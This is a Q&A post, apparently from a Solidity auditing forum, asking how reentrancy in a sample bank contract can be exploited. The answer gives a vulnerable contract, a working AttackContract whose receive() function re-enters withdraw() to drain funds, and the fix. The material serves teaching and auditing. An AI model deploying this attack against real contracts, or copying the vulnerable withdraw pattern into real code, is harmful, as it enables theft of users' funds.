# Ask about Reentrancy [Sample reentrant code]

Tags: solidity, audit

How an attacker could exploit this kinda reentrant SC?

```
pragma solidity ^0.8.2;

contract Private_Bank
{
    mapping (address => uint) public balances;
    
    uint public MinDeposit = 1 ether;
    
    Log TransferLog;
    
    function Private_Bank(address _log)
    {
        TransferLog = Log(_log);
    }
    
    function Deposit()
    public
    payable
    {
        if(msg.value >= MinDeposit)
        {
            balances[msg.sender]+=msg.value;
            TransferLog.AddMessage(msg.sender,msg.value,"Deposit");
        }
    }
    // <yes> Reentrancy
    function CashOut(uint _am)
    {
        if(_am<=balances[msg.sender])
        {
            
            if(msg.sender.call.value(_am)())
            {
                balances[msg.sender]-=_am;
                TransferLog.AddMessage(msg.sender,_am,"CashOut");
            }
        }
    }
    
    function() public payable{}    
    
}

contract Log 
{
   
    struct Message
    {
        address Sender;
        string  Data;
        uint Val;
        uint  Time;
    }
    
    Message[] public History;
    
    Message LastMsg;
    
    function AddMessage(address _adr,uint _val,string _data)
    public
    {
        LastMsg.Sender = _adr;
        LastMsg.Time = now;
        LastMsg.Val = _val;
        LastMsg.Data = _data;
        History.push(LastMsg);
    }
}
```

Answer (score 0):

Sorry, but your contract got a few compilation errors so you can refer to these contracts, we have the following 2 contracts which got similar deposit and withdraw logic:

**VulnerableContract.sol**

```
pragma solidity >=0.7.0 <0.9.0;

contract VulnerableContract {
    constructor() payable {}

    mapping(address => uint) public balances;

    function deposit() public payable {
        balances[msg.sender] = msg.value;
    }

    function withdraw() public {
        require(balances[msg.sender] > 0, "ERR: NO_BALANCE");
        (bool success, ) = msg.sender.call{value: balances[msg.sender]}("");
        if (success) {
            balances[msg.sender] = 0;
        }
    }

    function getBalance() public view returns(uint) {
        return address(this).balance;
    }
}
```

**And then the AttackContract.sol**

```
pragma solidity >=0.7.0 <0.9.0;

interface IVulnerableContract {
    function deposit() external payable;
    function withdraw() external;
}

contract AttackContract {
    function deposit(address address_) public payable {
        IVulnerableContract(address_).deposit{value: msg.value}();
    }

    function withdraw(address address_) public {
        IVulnerableContract(address_).withdraw();
    }

    receive() external payable {
        return IVulnerableContract(msg.sender).withdraw();
    }
}
```

Now what happens is the vulnerable contract uses `msg.sender.call` and this opens a possibility for external contracts to create reentrancy. When the attacking contract is executing the `withdraw` method this leads to `msg.sender.call` which is pointing to to the attacking contract fallback method and as you can see that fallback method is immediately withdrawing again which is basically creating a loop of withdraws until there is not enough balance to be drained from the vulnerable contract.

The fix would be to move `balances[msg.sender] = 0;` before the `msg.sender.call` or use `transfer` or `send` which both have a maximum limit of 2300 gas and thanks to that any malicious code in the attackers fallback will not be executed.